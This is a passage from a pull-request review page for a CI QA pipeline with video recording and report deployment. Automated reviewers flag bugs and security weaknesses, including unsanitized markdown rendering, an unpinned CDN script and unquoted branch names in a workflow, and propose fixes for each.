scripts/qa-record.ts |
(Referenced) Executes QA recording flows that produce the session artifacts consumed by report/review steps. |
scripts/qa-reproduce.ts |
Deterministic replay + a11y snapshotting + Gemini narration for evidence chain. |
scripts/qa-video-review.ts |
Generates structured (single or comparative) Gemini video review markdown reports. |
scripts/qa-video-review.test.ts |
Unit tests for platform/video selection utilities used by video review. |
scripts/qa-generate-test.ts |
Generates Playwright regression tests from QA report + PR diff via Gemini. |
scripts/qa-deploy-pages.sh |
Builds/deploys the QA report site + badge to Cloudflare Pages. |
scripts/qa-report-template.html |
Static report UI for videos, badge copy, and embedded markdown reviews. |
scripts/qa-batch.sh |
Utility for batch-triggering QA runs via branch pushes and cleanup. |
knip.config.ts |
Ignores CI-installed QA dependencies for knip. |
docs/qa/TROUBLESHOOTING.md |
Documents common pipeline failures and fixes. |
docs/qa/models.md |
Documents model choices and upgrade history for the pipeline. |
docs/qa/backlog.md |
Captures planned improvements and cost optimizations. |
.claude/skills/comfy-qa/SKILL.md |
Claude skill documentation for the QA pipeline operation. |
.claude/skills/comfy-qa/REPRODUCE.md |
Detailed manual/agent-driven issue reproduction procedure documentation. |
| <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>QA Session Recordings</title> | ||
| <link rel=preconnect href=https://fonts.googleapis.com><link rel=preconnect href=https://fonts.gstatic.com crossorigin><link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel=stylesheet> | ||
| <script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script> |
There was a problem hiding this comment.
marked is loaded from a CDN without pinning an exact version or using Subresource Integrity (SRI). This makes the report page vulnerable to supply-chain changes at the CDN URL. Consider pinning a specific marked@x.y.z and adding an integrity attribute (or bundling the dependency into the deployed assets).
| </div><script> | ||
| function copyBadge(){const u=location.href.replace(/\/[^/]*$/,'/');const b=u+'badge.svg';const md='[]('+u+')';navigator.clipboard.writeText(md).then(()=>{const btn=document.querySelector('.copy-badge');btn.classList.add('copied');btn.innerHTML='<svg width=14 height=14 viewBox="0 0 24 24" fill=none stroke=currentColor stroke-width=2><polyline points="20 6 9 17 4 12"/></svg>';setTimeout(()=>{btn.classList.remove('copied');btn.innerHTML='<svg width=14 height=14 viewBox="0 0 24 24" fill=none stroke=currentColor stroke-width=2><rect x=9 y=9 width=13 height=13 rx=2/><path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1"/></svg>'},2000)})} | ||
| document.querySelectorAll('[data-md]').forEach(el=>{const t=el.textContent;el.removeAttribute('data-md');el.innerHTML=marked.parse(t)}); | ||
| const FPS=30,FT=1/FPS,SPEEDS=[0.1,0.25,0.5,1,1.5,2]; |
There was a problem hiding this comment.
Markdown is converted to HTML via marked.parse() and assigned to innerHTML without any sanitization. Since the markdown comes from AI output and PR/issue context, this can introduce XSS vectors (e.g., javascript: links or attribute injection in images/links). Consider sanitizing the rendered HTML (e.g., DOMPurify) and/or restricting allowed URL protocols and disallowing raw HTML in the renderer.
| // Check assertion | ||
| let assertionPassed = false | ||
| let assertionActual = '' | ||
| if (step.expectedAssertion) { | ||
| // Parse the expected assertion — e.g. "Settings dialog: visible" or "tab count: 2" |
There was a problem hiding this comment.
assertionPassed starts as false and is only updated when step.expectedAssertion is truthy. If a plan step has an empty/missing expectedAssertion, that entry will stay false and can make the overall allAssertionsPassed false even though no assertion was intended. Consider treating missing assertions as passed (or excluding such steps from the aggregate) so the overall verdict reflects only asserted checks.
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| # Check for after files | ||
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
|
|
||
| if [ "$HAS_FILES" = true ]; then | ||
| mkdir -p "$REPORT_DIR" | ||
| # Copy all before files (handles both flat and nested layouts) | ||
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| # Copy all after files (overwrites duplicates with after versions) | ||
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| echo "Merged $os artifacts into $REPORT_DIR" | ||
| ls -la "$REPORT_DIR/" | head -20 |
There was a problem hiding this comment.
Copying all files found under qa-artifacts/before into a single $REPORT_DIR will flatten the directory structure and can overwrite same-named files from different matrix runs (e.g. multiple qa-session.webm/mp4). To keep per-OS outputs distinct, preserve the original qa-report-* subdirectories when merging (copy directories rather than individual files).
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy all before files (handles both flat and nested layouts) | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| # Copy all after files (overwrites duplicates with after versions) | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR/before" "$REPORT_DIR/after" | |
| # Preserve original before report directories to avoid flattening files | |
| find qa-artifacts/before -mindepth 1 -maxdepth 1 -type d -name 'qa-report-*' 2>/dev/null | while read -r dir; do | |
| cp -R "$dir" "$REPORT_DIR/before/" 2>/dev/null || true | |
| done | |
| # Preserve original after report directories to avoid flattening files | |
| find qa-artifacts/after -mindepth 1 -maxdepth 1 -type d -name 'qa-report-*' 2>/dev/null | while read -r dir; do | |
| cp -R "$dir" "$REPORT_DIR/after/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| find "$REPORT_DIR" -maxdepth 3 -type f 2>/dev/null | head -20 |
| for os in Linux macOS Windows; do | ||
| REPORT_DIR="qa-artifacts/qa-report-${os}-${{ github.run_id }}" | ||
| HAS_FILES=false | ||
|
|
||
| # Check for before files (flat or in subdirectory) | ||
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| # Check for after files | ||
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
|
|
||
| if [ "$HAS_FILES" = true ]; then | ||
| mkdir -p "$REPORT_DIR" | ||
| # Copy all before files (handles both flat and nested layouts) | ||
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| # Copy all after files (overwrites duplicates with after versions) | ||
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| echo "Merged $os artifacts into $REPORT_DIR" | ||
| ls -la "$REPORT_DIR/" | head -20 | ||
| break # Only create one report dir (multi-OS not yet supported in parallel mode) | ||
| fi | ||
| done | ||
|
|
There was a problem hiding this comment.
Similarly, flattening all qa-artifacts/after files into $REPORT_DIR can overwrite per-OS recordings and prevents the deploy step from finding qa-artifacts/qa-report-{OS}-{RUN_ID}/qa-session.mp4. Preserve directory structure when merging so each OS retains its own qa-report-* directory.
| for os in Linux macOS Windows; do | |
| REPORT_DIR="qa-artifacts/qa-report-${os}-${{ github.run_id }}" | |
| HAS_FILES=false | |
| # Check for before files (flat or in subdirectory) | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy all before files (handles both flat and nested layouts) | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| # Copy all after files (overwrites duplicates with after versions) | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 | |
| break # Only create one report dir (multi-OS not yet supported in parallel mode) | |
| fi | |
| done | |
| HAS_FILES=false | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -type f 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -type f 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| merge_artifact_tree() { | |
| SRC_ROOT="$1" | |
| if [ ! -d "$SRC_ROOT" ]; then | |
| return 0 | |
| fi | |
| find "$SRC_ROOT" -type f 2>/dev/null | while read -r f; do | |
| REL_PATH="${f#${SRC_ROOT}/}" | |
| DEST_PATH="qa-artifacts/${REL_PATH}" | |
| mkdir -p "$(dirname "$DEST_PATH")" | |
| cp "$f" "$DEST_PATH" 2>/dev/null || true | |
| done | |
| } | |
| # Preserve nested qa-report-* directories so downstream steps can | |
| # resolve qa-artifacts/qa-report-{OS}-${{ github.run_id }}/qa-session.mp4. | |
| merge_artifact_tree "qa-artifacts/before" | |
| merge_artifact_tree "qa-artifacts/after" | |
| echo "Merged artifacts with directory structure preserved" | |
| find qa-artifacts -maxdepth 2 -type d -name 'qa-report-*' 2>/dev/null | sort | |
| fi |
|
|
||
| # Check for before files (flat or in subdirectory) | ||
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
| # Check for after files | ||
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | ||
| HAS_FILES=true | ||
| fi | ||
|
|
||
| if [ "$HAS_FILES" = true ]; then | ||
| mkdir -p "$REPORT_DIR" | ||
| # Copy all before files (handles both flat and nested layouts) | ||
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| # Copy all after files (overwrites duplicates with after versions) | ||
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | ||
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | ||
| done | ||
| echo "Merged $os artifacts into $REPORT_DIR" | ||
| ls -la "$REPORT_DIR/" | head -20 | ||
| break # Only create one report dir (multi-OS not yet supported in parallel mode) |
There was a problem hiding this comment.
The break here limits report generation to a single OS directory. In qa-full (3-OS) runs this will drop other platforms from the deployed report. If multi-OS reporting is expected, remove the break and generate per-OS report dirs for all platforms present.
| # Check for before files (flat or in subdirectory) | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| # Check for after files | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -name '*.webm' -o -name '*.png' 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy all before files (handles both flat and nested layouts) | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| # Copy all after files (overwrites duplicates with after versions) | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 | |
| break # Only create one report dir (multi-OS not yet supported in parallel mode) | |
| OS_PATTERN="/${os}/|[-_]${os}[-_.]" | |
| # Detect whether this OS has files in a nested or OS-tagged layout. | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "$OS_PATTERN"; then | |
| HAS_FILES=true | |
| fi | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "$OS_PATTERN"; then | |
| HAS_FILES=true | |
| fi | |
| # Preserve focused/Linux flat layout support when files are not OS-qualified. | |
| if [ "$HAS_FILES" = false ] && [ "$os" = "Linux" ]; then | |
| if [ -d "qa-artifacts/before" ] && find qa-artifacts/before -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| if [ -d "qa-artifacts/after" ] && find qa-artifacts/after -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -q .; then | |
| HAS_FILES=true | |
| fi | |
| fi | |
| if [ "$HAS_FILES" = true ]; then | |
| mkdir -p "$REPORT_DIR" | |
| # Copy before files for this OS. Fall back to all files for Linux flat layout. | |
| find qa-artifacts/before -type f 2>/dev/null | while read f; do | |
| if printf '%s\n' "$f" | grep -Eiq "$OS_PATTERN" || { [ "$os" = "Linux" ] && ! find qa-artifacts/before -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "/(Linux|macOS|Windows)/|[-_](Linux|macOS|Windows)[-_.]"; }; then | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| fi | |
| done | |
| # Copy after files for this OS. After copies overwrite duplicate before files. | |
| find qa-artifacts/after -type f 2>/dev/null | while read f; do | |
| if printf '%s\n' "$f" | grep -Eiq "$OS_PATTERN" || { [ "$os" = "Linux" ] && ! find qa-artifacts/after -type f \( -name '*.webm' -o -name '*.png' \) 2>/dev/null | grep -Eiq "/(Linux|macOS|Windows)/|[-_](Linux|macOS|Windows)[-_.]"; }; then | |
| cp "$f" "$REPORT_DIR/" 2>/dev/null || true | |
| fi | |
| done | |
| echo "Merged $os artifacts into $REPORT_DIR" | |
| ls -la "$REPORT_DIR/" | head -20 |
| BRANCH: ${{ github.ref_name }} | ||
| REPO: ${{ github.repository }} | ||
| run: | | ||
| NUM="${PR_NUM:-$(gh pr list --repo "$REPO" --head "$BRANCH" --state open --json number --jq '.[0].number // empty')}" | ||
| echo "number=${NUM}" >> "$GITHUB_OUTPUT" | ||
|
|
||
| if [ -n "$NUM" ]; then | ||
| if gh api "repos/${REPO}/pulls/${NUM}" --jq '.number' >/dev/null 2>&1; then |
There was a problem hiding this comment.
This step resolves the target number from the PR context (github.event.pull_request.number / PR lookup by branch), but it does not handle workflows triggered by issues:labeled. In issue reproduce runs, BRANCH can be empty and number may be unset, which cascades into missing target URLs/context and no issue comment/badge labeling. Prefer reusing needs.resolve-matrix.outputs.number / target_type, or include github.event.issue.number here.
| BRANCH: ${{ github.ref_name }} | |
| REPO: ${{ github.repository }} | |
| run: | | |
| NUM="${PR_NUM:-$(gh pr list --repo "$REPO" --head "$BRANCH" --state open --json number --jq '.[0].number // empty')}" | |
| echo "number=${NUM}" >> "$GITHUB_OUTPUT" | |
| if [ -n "$NUM" ]; then | |
| if gh api "repos/${REPO}/pulls/${NUM}" --jq '.number' >/dev/null 2>&1; then | |
| ISSUE_NUM: ${{ github.event.issue.number }} | |
| BRANCH: ${{ github.ref_name }} | |
| REPO: ${{ github.repository }} | |
| run: | | |
| NUM="${PR_NUM:-${ISSUE_NUM:-}}" | |
| if [ -z "$NUM" ] && [ -n "$BRANCH" ]; then | |
| NUM="$(gh pr list --repo "$REPO" --head "$BRANCH" --state open --json number --jq '.[0].number // empty')" | |
| fi | |
| echo "number=${NUM}" >> "$GITHUB_OUTPUT" | |
| if [ -n "$NUM" ]; then | |
| if [ -n "$ISSUE_NUM" ] && [ "$NUM" = "$ISSUE_NUM" ]; then | |
| echo "target_type=issue" >> "$GITHUB_OUTPUT" | |
| elif gh api "repos/${REPO}/pulls/${NUM}" --jq '.number' >/dev/null 2>&1; then |
There was a problem hiding this comment.
Actionable comments posted: 9
🧹 Nitpick comments (6)
scripts/qa-generate-test.ts (1)
140-144: Consider making the markdown fence stripping more robust.The regex only handles
```typescriptand```tsfences. If the model returns```javascriptor other language hints, they won't be stripped.♻️ Suggested improvement
// Strip markdown fences if model wraps output return text - .replace(/^```(?:typescript|ts)?\n?/, '') + .replace(/^```[a-z]*\n?/, '') .replace(/\n?```$/, '') .trim()🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-generate-test.ts` around lines 140 - 144, The current markdown-fence stripping only matches "```typescript" or "```ts"; update the first replace on the returned text so it strips any fenced-code language hint instead (e.g., replace the /^```(?:typescript|ts)?\n?/ pattern used when returning text) by using a single, broader regex that matches any characters after the opening backticks up to the newline (for example /^```[^\n]*\n?/), ensuring the final .replace and .trim logic remain unchanged.scripts/qa-batch.sh (1)
90-92:grep -oPrequires GNU grep (not available by default on macOS).The Perl regex flag
-Pis a GNU grep extension. If developers run this script on macOS, they'll needggrepfrom Homebrew. Since this is a CI utility script primarily, this is likely acceptable, but consider documenting or using a more portable alternative.♻️ Portable alternative using awk
# Extract Tier 1 table rows: | N | [`#NNNNN`](...) | ... # Stop at the next ## heading after Tier 1 extracted=$(awk '/^## Tier 1/,/^## Tier [^1]/' "$FROM_FILE" \ - | grep -oP '\[#\K\d+' \ + | sed -n 's/.*\[#\([0-9]*\)\].*/\1/p' \ | head -n "$TOP_N")🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-batch.sh` around lines 90 - 92, The current assignment to the variable `extracted` uses `grep -oP` (Perl-regex) which depends on GNU grep; replace that pipeline with a portable awk-only extraction (so the section selection with awk then extracting the digits that follow `[#` without using `-P`), or alternatively add a clear comment/documentation near the `extracted` assignment stating that GNU grep (`ggrep`) is required on macOS and fail fast if it's not present; update the `extracted` assignment (referencing the `extracted` variable and the pipeline that currently uses `awk ... | grep -oP '\[#\K\d+' | head -n "$TOP_N"`) to use one of these portable approaches.scripts/qa-report-template.html (1)
3-3: Consider adding SRI hash for external marked.js dependency.Loading
marked.min.jsfrom CDN without subresource integrity (SRI) allows potential supply-chain attacks if the CDN is compromised.♻️ Add integrity attribute
-<script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script> +<script src="https://cdn.jsdelivr.net/npm/marked@15.0.7/marked.min.js" integrity="sha384-..." crossorigin="anonymous"></script>You can generate the hash using:
curl -s https://cdn.jsdelivr.net/npm/marked@15.0.7/marked.min.js | openssl dgst -sha384 -binary | openssl base64 -A🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-report-template.html` at line 3, The external marked.js script tag (src="https://cdn.jsdelivr.net/npm/marked/marked.min.js") lacks SRI and crossorigin attributes; update the script element to pin a specific version (e.g., use marked@15.0.7 in the src), compute the SHA-384 base64 hash for that exact file (using the curl + openssl command shown in the review), and add integrity="sha384-..." and crossorigin="anonymous" attributes to the tag so the browser verifies the file before executing.scripts/qa-video-review.ts (1)
668-708: Minor inefficiency:statcalled twice for before video.The
beforeVideoPathis stat'd at line 668 for logging and again at line 705 for the report. Consider caching the stat result to avoid the redundant filesystem call.♻️ Cache stat result to avoid redundant call
const beforeVideoPath = options.beforeVideo ? resolve(options.beforeVideo) : '' + let beforeVideoStat: Awaited<ReturnType<typeof stat>> | undefined if (beforeVideoPath) { - const beforeStat = await stat(beforeVideoPath) + beforeVideoStat = await stat(beforeVideoPath) process.stdout.write( - `[${video.platformName}] Before video: ${toProjectRelativePath(beforeVideoPath)} (${formatBytes(beforeStat.size)})\n` + `[${video.platformName}] Before video: ${toProjectRelativePath(beforeVideoPath)} (${formatBytes(beforeVideoStat.size)})\n` ) } // ... later ... if (beforeVideoPath) { - const beforeStat = await stat(beforeVideoPath) reportInput.beforeVideoPath = beforeVideoPath - reportInput.beforeVideoSizeBytes = beforeStat.size + reportInput.beforeVideoSizeBytes = beforeVideoStat!.size }🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/qa-video-review.ts` around lines 668 - 708, The code calls stat(beforeVideoPath) twice: once to log size into beforeStat and again to populate reportInput.beforeVideoSizeBytes; reuse the first result instead of calling stat a second time. Keep the existing beforeStat variable (from the logging block) in scope or rename to beforeStatCached and then set reportInput.beforeVideoPath = beforeVideoPath and reportInput.beforeVideoSizeBytes = beforeStatCached.size before calling buildReportMarkdown; ensure no second await stat(beforeVideoPath) remains..github/workflows/pr-qa.yaml (2)
498-642: Badge generation scripts are functional but could be extracted.The inline badge generation scripts (gen-badge.sh, gen-badge-dual.sh, gen-badge-box.sh) are complex and total ~150 lines. Consider extracting these to
scripts/qa-gen-badge.shfor easier maintenance and testing, though this is optional given they work correctly.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/pr-qa.yaml around lines 498 - 642, The inline badge-generation scripts (gen-badge.sh, gen-badge-dual.sh, gen-badge-box.sh) are large and should be extracted into a maintained script file; move the contents of each heredoc into a new executable file under scripts/, e.g. scripts/qa-gen-badge.sh (or separate files scripts/gen-badge.sh, scripts/gen-badge-dual.sh, scripts/gen-badge-box.sh), preserve the exact function names/entrypoints (usage comments and variable names like BUG, FIX, REPRO, add_row) and make them executable, then update the workflow to call those scripts (replace the heredoc creation steps with simple cp or checkout references and chmod +x and ensure /tmp/gen-badge.sh, /tmp/gen-badge-dual.sh, /tmp/gen-badge-box.sh invocations still work) so the behavior remains identical but the scripts live in the repo for testing and maintenance.
494-494: Consider usingnpxinstead of global wrangler install.Using
npm install -ginstalls globally, which works butnpx wrangler@4.74.0would be cleaner and avoid polluting the global namespace. This is a minor suggestion.♻️ Use npx instead of global install
Replace the global install and subsequent
wranglercalls withnpx wrangler@4.74.0:- npm install -g wrangler@4.74.0 >/dev/null 2>&1 + # wrangler will be invoked via npx belowThen in deploy-badge.sh and qa-deploy-pages.sh, use:
- wrangler pages deploy ... + npx wrangler@4.74.0 pages deploy ...🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/pr-qa.yaml at line 494, Replace the global installation command `npm install -g wrangler@4.74.0` with using npx for the specific wrangler invocation; update any subsequent calls that rely on a globally installed `wrangler` (references in deploy-badge.sh and qa-deploy-pages.sh) to invoke `npx wrangler@4.74.0` instead so the workflow runs the pinned version without installing globally and avoids modifying the runner's global state.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/pr-qa.yaml:
- Around line 862-910: The step uses github.head_ref directly in the inline
shell which allows shell injection via PR_BRANCH and later TEST_BRANCH; set the
branch value as a step-level env var (e.g., env: PR_BRANCH: '${{ github.head_ref
|| github.ref_name }}') and then in the script sanitize and safely quote it
before use (e.g., PR_BRANCH="${PR_BRANCH//[^a-zA-Z0-9._\/-]/_}";
PR_BRANCH="${PR_BRANCH}" and always quote expansions like "$PR_BRANCH" and
"$TEST_BRANCH"), and use safe git invocations (git checkout -- "$TEST_BRANCH",
git push origin -- "$TEST_BRANCH") so git commands and the branch names
(PR_BRANCH, TEST_BRANCH) cannot be used to inject shell commands.
In `@scripts/qa-analyze-pr.ts`:
- Around line 120-132: ghExec currently swallows all gh failures and returns an
empty string, which lets PR/issue fetchers (the functions that call ghExec to
get title/body/diff) continue with bogus empty data; change ghExec to propagate
failures by throwing an Error (including the command, exit code/ stderr and
original error message) instead of returning '' (or alternatively call
process.exit(1) after logging), and update the callers in the PR/issue fetchers
to either catch and handle that exception or let it bubble to fail the job;
ensure logs include the gh command, stderr and error.message for debugging.
In `@scripts/qa-deploy-pages.sh`:
- Around line 372-380: The script currently masks deployment failures by running
`wrangler pages deploy ... 2>&1) || true` and always writing a fallback `url=`
to `GITHUB_OUTPUT`; remove the `|| true` and instead check the deploy exit
status (or inspect `DEPLOY_OUTPUT`) after running `wrangler pages deploy` and
only set `URL`/`FALLBACK_URL` and write to `GITHUB_OUTPUT` when the deploy
succeeded; if the deploy failed, emit an error (use `echo`/`processLogger`
equivalent) and exit non-zero so downstream steps don't get a fake Pages URL —
key symbols to update: `wrangler pages deploy`, `DEPLOY_OUTPUT`, `URL`,
`FALLBACK_URL`, and `GITHUB_OUTPUT`.
In `@scripts/qa-record.ts`:
- Around line 1035-1044: The current case 'cloneNode' handler in
scripts/qa-record.ts is performing a generic copy/paste (Ctrl+C/Ctrl+V) which
does not exercise the real Clone functionality; replace the keystroke sequence
with a call that invokes the application's actual Clone/duplicate command (e.g.,
click the clone/duplicate toolbar/menu/button element or trigger the app's clone
command via the command palette or exposed API) so tests exercise the Clone code
path; update the same pattern in the other cloneNode occurrences noted (the
blocks around the other mentions) to use the real clone action instead of
Ctrl+C/Ctrl+V and emit a matching log message.
- Around line 630-687: The loadDefaultWorkflow flow can mark loaded=true even
when no menu action ran because resetToDefaultWorkflow may be missing and
clickSubmenuItem never reports failure; change clickSubmenuItem to return a
boolean (true when it found & clicked a menu entry, false when none matched) and
update loadDefaultWorkflow to use that return value (and the presence of
resetToDefaultWorkflow) to set loaded only when an actual action occurred;
specifically modify clickSubmenuItem (and its callers) to return true after each
successful PrimeVue, litegraph, or role="menuitem" path and return false at the
end, then in loadDefaultWorkflow check the boolean result from clickSubmenuItem
and only set loaded = true when resetToDefaultWorkflow exists or
clickSubmenuItem returned true, otherwise log/handle failure.
- Around line 745-769: The clickByText function currently treats missing/failed
actions as successes (it only console.warns), so update it to return or throw a
failure when the target element is not found or when critical steps fail: if
el.isVisible() is false, immediately return { success: false, reason: 'element
not found', target: text } (or throw an Error); if boundingBox() is null and you
rely on cursor overlay actions, treat that as non-fatal only if you still
successfully click, otherwise return failure; when el.click() rejects, return {
success: false, reason: 'click failed', error: e.message } instead of just
logging; apply the same pattern to related functions referenced in the diff
(moveCursorOverlay, clickCursorOverlay, other click-by-* utilities in the
789-1107 range) so all branches produce a clear failure result or throw, not
just console.warn.
- Around line 1921-1925: The per-pass replay output is being overwritten because
Phase 2 always writes to a deterministic qa-session.webm instead of the
pass-specific name; update the Phase 2 copy/rename logic to use the loop's
videoName variable (constructed from subIssues and sessionLabel) as the
temporary/output filename so each pass writes to a unique file and the later
rename step moves the correct per-pass recording; ensure any hard-coded
"qa-session.webm" occurrences are replaced to reference videoName (and preserve
behavior when subIssues.length === 1 by allowing an empty sessionLabel).
In `@scripts/qa-reproduce.ts`:
- Around line 53-79: The accessibility snapshot returned by
locator.ariaSnapshot() is a YAML string, so instead of casting it to A11yNode,
first await the Promise<string> and parse the YAML into an object (or use
Playwright's parser) before calling searchA11y; update the code that currently
casts the result (where a11yAfter is treated as A11yNode) to await
locator.ariaSnapshot(), parse the YAML into the A11yNode shape, and then pass
that parsed object to searchA11y and subsequent checks so node.name and
node.children are valid.
In `@scripts/qa-video-review.ts`:
- Around line 587-589: The timeout is being passed directly to
model.generateContent which the deprecated `@google/generative-ai` SDK ignores;
update the call to pass the timeout inside a requestOptions object (i.e., when
calling model.generateContent(parts, ...) wrap options.timeoutMs as
requestOptions: { timeout: options.timeoutMs }) so the SDK respects the timeout
setting.
---
Nitpick comments:
In @.github/workflows/pr-qa.yaml:
- Around line 498-642: The inline badge-generation scripts (gen-badge.sh,
gen-badge-dual.sh, gen-badge-box.sh) are large and should be extracted into a
maintained script file; move the contents of each heredoc into a new executable
file under scripts/, e.g. scripts/qa-gen-badge.sh (or separate files
scripts/gen-badge.sh, scripts/gen-badge-dual.sh, scripts/gen-badge-box.sh),
preserve the exact function names/entrypoints (usage comments and variable names
like BUG, FIX, REPRO, add_row) and make them executable, then update the
workflow to call those scripts (replace the heredoc creation steps with simple
cp or checkout references and chmod +x and ensure /tmp/gen-badge.sh,
/tmp/gen-badge-dual.sh, /tmp/gen-badge-box.sh invocations still work) so the
behavior remains identical but the scripts live in the repo for testing and
maintenance.
- Line 494: Replace the global installation command `npm install -g
wrangler@4.74.0` with using npx for the specific wrangler invocation; update any
subsequent calls that rely on a globally installed `wrangler` (references in
deploy-badge.sh and qa-deploy-pages.sh) to invoke `npx wrangler@4.74.0` instead
so the workflow runs the pinned version without installing globally and avoids
modifying the runner's global state.
In `@scripts/qa-batch.sh`:
- Around line 90-92: The current assignment to the variable `extracted` uses
`grep -oP` (Perl-regex) which depends on GNU grep; replace that pipeline with a
portable awk-only extraction (so the section selection with awk then extracting
the digits that follow `[#` without using `-P`), or alternatively add a clear
comment/documentation near the `extracted` assignment stating that GNU grep
(`ggrep`) is required on macOS and fail fast if it's not present; update the
`extracted` assignment (referencing the `extracted` variable and the pipeline
